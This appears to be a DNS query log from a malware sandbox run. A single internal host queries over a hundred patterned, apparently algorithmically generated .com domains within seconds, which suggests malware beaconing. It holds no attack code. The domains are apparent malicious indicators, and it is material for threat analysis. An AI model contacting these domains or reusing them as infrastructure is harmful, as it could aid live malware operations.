                                                                                                                                                                                                          Nov 11, 2024 18:24:04.945400953 CET192.168.2.81.1.1.10x6456Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.950491905 CET192.168.2.81.1.1.10xf2a6Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.951400995 CET192.168.2.81.1.1.10xec91Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.027020931 CET192.168.2.81.1.1.10x9b93Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.027131081 CET192.168.2.81.1.1.10xd7d8Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.029359102 CET192.168.2.81.1.1.10xf89fStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.031450033 CET192.168.2.81.1.1.10x5c85Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.032654047 CET192.168.2.81.1.1.10x49f5Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.033576965 CET192.168.2.81.1.1.10x5146Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.034827948 CET192.168.2.81.1.1.10xa30eStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.037971020 CET192.168.2.81.1.1.10x3ddStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.038901091 CET192.168.2.81.1.1.10x61c6Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.039794922 CET192.168.2.81.1.1.10x390cStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.041862965 CET192.168.2.81.1.1.10x756aStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.042838097 CET192.168.2.81.1.1.10x1748Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.043385983 CET192.168.2.81.1.1.10x869aStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.059433937 CET192.168.2.81.1.1.10xb0a9Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.062302113 CET192.168.2.81.1.1.10x6d97Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.079761982 CET192.168.2.81.1.1.10x8c4cStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.160078049 CET192.168.2.81.1.1.10x5c88Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.170840025 CET192.168.2.81.1.1.10xc16cStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.178246975 CET192.168.2.81.1.1.10xd044Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.183435917 CET192.168.2.81.1.1.10x999fStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.191323996 CET192.168.2.81.1.1.10xdb78Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.195502043 CET192.168.2.81.1.1.10x5e53Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.197626114 CET192.168.2.81.1.1.10xc96bStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.202059031 CET192.168.2.81.1.1.10x7f07Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.204164982 CET192.168.2.81.1.1.10x8264Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.205940008 CET192.168.2.81.1.1.10x4ca0Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.226659060 CET192.168.2.81.1.1.10x2d76Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.227137089 CET192.168.2.81.1.1.10x5269Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.232743979 CET192.168.2.81.1.1.10xf445Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.233437061 CET192.168.2.81.1.1.10x6e53Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.233835936 CET192.168.2.81.1.1.10x85cfStandard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.915437937 CET192.168.2.81.1.1.10x756fStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.920247078 CET192.168.2.81.1.1.10x84f7Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.926701069 CET192.168.2.81.1.1.10xf2d4Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.929924011 CET192.168.2.81.1.1.10x7e99Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.930286884 CET192.168.2.81.1.1.10xfaa1Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.932799101 CET192.168.2.81.1.1.10x23e1Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.937597990 CET192.168.2.81.1.1.10xc236Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.940262079 CET192.168.2.81.1.1.10xa668Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.942461967 CET192.168.2.81.1.1.10x81ddStandard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.943584919 CET192.168.2.81.1.1.10x4430Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.953176975 CET192.168.2.81.1.1.10x9e20Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.956360102 CET192.168.2.81.1.1.10x3e0aStandard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.959099054 CET192.168.2.81.1.1.10xe803Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.961899042 CET192.168.2.81.1.1.10x904eStandard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.962480068 CET192.168.2.81.1.1.10x152eStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.963397980 CET192.168.2.81.1.1.10xa175Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.965799093 CET192.168.2.81.1.1.10x2628Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.967516899 CET192.168.2.81.1.1.10x7278Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.968928099 CET192.168.2.81.1.1.10xe898Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.970185041 CET192.168.2.81.1.1.10x4e27Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.970992088 CET192.168.2.81.1.1.10xe4e9Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.972575903 CET192.168.2.81.1.1.10x2ea2Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.003016949 CET192.168.2.81.1.1.10x367cStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.003210068 CET192.168.2.81.1.1.10xc9bfStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006541967 CET192.168.2.81.1.1.10xfd3dStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006719112 CET192.168.2.81.1.1.10x20ecStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006871939 CET192.168.2.81.1.1.10x9133Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007148981 CET192.168.2.81.1.1.10x8e33Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007148981 CET192.168.2.81.1.1.10xd0c2Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007281065 CET192.168.2.81.1.1.10x7775Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007431984 CET192.168.2.81.1.1.10x5895Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.012125969 CET192.168.2.81.1.1.10xfef1Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.019779921 CET192.168.2.81.1.1.10xa15Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.025954962 CET192.168.2.81.1.1.10x2421Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.026531935 CET192.168.2.81.1.1.10x135dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027014017 CET192.168.2.81.1.1.10x8eb8Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027168989 CET192.168.2.81.1.1.10x9009Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027321100 CET192.168.2.81.1.1.10x46a9Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027467012 CET192.168.2.81.1.1.10x180bStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027805090 CET192.168.2.81.1.1.10x2523Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.039509058 CET192.168.2.81.1.1.10xb8f5Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.056596041 CET192.168.2.81.1.1.10xfce7Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.098437071 CET192.168.2.81.1.1.10xec86Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.102458000 CET192.168.2.81.1.1.10x41bfStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.103123903 CET192.168.2.81.1.1.10x879fStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.103626966 CET192.168.2.81.1.1.10x1a7cStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168229103 CET192.168.2.81.1.1.10x874cStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168548107 CET192.168.2.81.1.1.10x751fStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168690920 CET192.168.2.81.1.1.10xb471Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.195358038 CET192.168.2.81.1.1.10xebe6Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.195771933 CET192.168.2.81.1.1.10xbdf2Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.202366114 CET192.168.2.81.1.1.10x2873Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.202909946 CET192.168.2.81.1.1.10x506dStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.203015089 CET192.168.2.81.1.1.10xbabaStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.206590891 CET192.168.2.81.1.1.10x83d0Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.206823111 CET192.168.2.81.1.1.10x9107Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.206854105 CET192.168.2.81.1.1.10xd8c0Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.207884073 CET192.168.2.81.1.1.10x38fbStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.208352089 CET192.168.2.81.1.1.10x4927Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.208389044 CET192.168.2.81.1.1.10xeb15Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.208997011 CET192.168.2.81.1.1.10xab64Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.209126949 CET192.168.2.81.1.1.10x1a20Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.209561110 CET192.168.2.81.1.1.10x3fdbStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.210203886 CET192.168.2.81.1.1.10x77ffStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.210854053 CET192.168.2.81.1.1.10xd359Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.212985039 CET192.168.2.81.1.1.10x7c8dStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.214348078 CET192.168.2.81.1.1.10x4450Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.214761019 CET192.168.2.81.1.1.10x5af7Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.224765062 CET192.168.2.81.1.1.10xa645Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.227714062 CET192.168.2.81.1.1.10x3ffcStandard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.229443073 CET192.168.2.81.1.1.10x4a5fStandard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.231446028 CET192.168.2.81.1.1.10xc189Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.235937119 CET192.168.2.81.1.1.10xe5cbStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.238384008 CET192.168.2.81.1.1.10xaea9Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.242109060 CET192.168.2.81.1.1.10x24f2Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.242369890 CET192.168.2.81.1.1.10x8028Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.254612923 CET192.168.2.81.1.1.10xa66Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.273566008 CET192.168.2.81.1.1.10xcb03Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.275269985 CET192.168.2.81.1.1.10xec81Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.275527000 CET192.168.2.81.1.1.10xb051Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.278585911 CET192.168.2.81.1.1.10xa405Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.280720949 CET192.168.2.81.1.1.10xc58cStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.280889034 CET192.168.2.81.1.1.10xa64bStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.283035994 CET192.168.2.81.1.1.10x1e50Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.284190893 CET192.168.2.81.1.1.10x9623Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.284241915 CET192.168.2.81.1.1.10x98f6Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.326251984 CET192.168.2.81.1.1.10x27b6Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.326467991 CET192.168.2.81.1.1.10x3dadStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327253103 CET192.168.2.81.1.1.10x97beStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327642918 CET192.168.2.81.1.1.10x825Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327945948 CET192.168.2.81.1.1.10xb2a1Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328151941 CET192.168.2.81.1.1.10x92e2Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328533888 CET192.168.2.81.1.1.10x7cbStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328753948 CET192.168.2.81.1.1.10xf68dStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329123974 CET192.168.2.81.1.1.10x56b4Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329596996 CET192.168.2.81.1.1.10xa220Standard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329794884 CET192.168.2.81.1.1.10x9509Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.330245018 CET192.168.2.81.1.1.10xe803Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.340181112 CET192.168.2.81.1.1.10x3d4aStandard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341378927 CET192.168.2.81.1.1.10x3d2Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341474056 CET192.168.2.81.1.1.10xf838Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.345406055 CET192.168.2.81.1.1.10x7958Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.347930908 CET192.168.2.81.1.1.10xb891Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.348114967 CET192.168.2.81.1.1.10x121cStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371870995 CET192.168.2.81.1.1.10xfe60Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371990919 CET192.168.2.81.1.1.10x66eStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372078896 CET192.168.2.81.1.1.10xdb83Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372275114 CET192.168.2.81.1.1.10x929fStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372622013 CET192.168.2.81.1.1.10xa3ffStandard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.373157978 CET192.168.2.81.1.1.10x1b8cStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.373949051 CET192.168.2.81.1.1.10xb362Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.377012014 CET192.168.2.81.1.1.10xe346Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.377702951 CET192.168.2.81.1.1.10x24b8Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378170013 CET192.168.2.81.1.1.10xfb86Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378581047 CET192.168.2.81.1.1.10x88dbStandard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378602982 CET192.168.2.81.1.1.10xd2edStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379522085 CET192.168.2.81.1.1.10x5df9Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379535913 CET192.168.2.81.1.1.10x4d97Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379750967 CET192.168.2.81.1.1.10x204eStandard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380199909 CET192.168.2.81.1.1.10xbce4Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380464077 CET192.168.2.81.1.1.10x443dStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380717993 CET192.168.2.81.1.1.10x91b9Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381145954 CET192.168.2.81.1.1.10x5442Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381316900 CET192.168.2.81.1.1.10xd130Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381337881 CET192.168.2.81.1.1.10x387bStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381639004 CET192.168.2.81.1.1.10x4dc0Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381700993 CET192.168.2.81.1.1.10x7db0Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.892559052 CET192.168.2.81.1.1.10xd7fdStandard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.897095919 CET192.168.2.81.1.1.10x4d38Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.897932053 CET192.168.2.81.1.1.10xa650Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.905782938 CET192.168.2.81.1.1.10x9fe3Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.911660910 CET192.168.2.81.1.1.10x2ca2Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.913932085 CET192.168.2.81.1.1.10xa25aStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.917422056 CET192.168.2.81.1.1.10xb19Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.919970989 CET192.168.2.81.1.1.10x25a7Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.920609951 CET192.168.2.81.1.1.10xe31aStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.921519041 CET192.168.2.81.1.1.10x18d8Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.922144890 CET192.168.2.81.1.1.10xa8e5Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.922810078 CET192.168.2.81.1.1.10xe2aeStandard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.923381090 CET192.168.2.81.1.1.10x8568Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.924300909 CET192.168.2.81.1.1.10x30dbStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.925564051 CET192.168.2.81.1.1.10x9091Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.926136017 CET192.168.2.81.1.1.10xce25Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.966851950 CET192.168.2.81.1.1.10x769bStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.967138052 CET192.168.2.81.1.1.10x25cfStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.967644930 CET192.168.2.81.1.1.10xef50Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.967921019 CET192.168.2.81.1.1.10xab3Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.981900930 CET192.168.2.81.1.1.10x9c2bStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.982528925 CET192.168.2.81.1.1.10x5a22Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.983805895 CET192.168.2.81.1.1.10x4c44Standard query (0)qegynap.comA (IP address)IN (0x0001)false
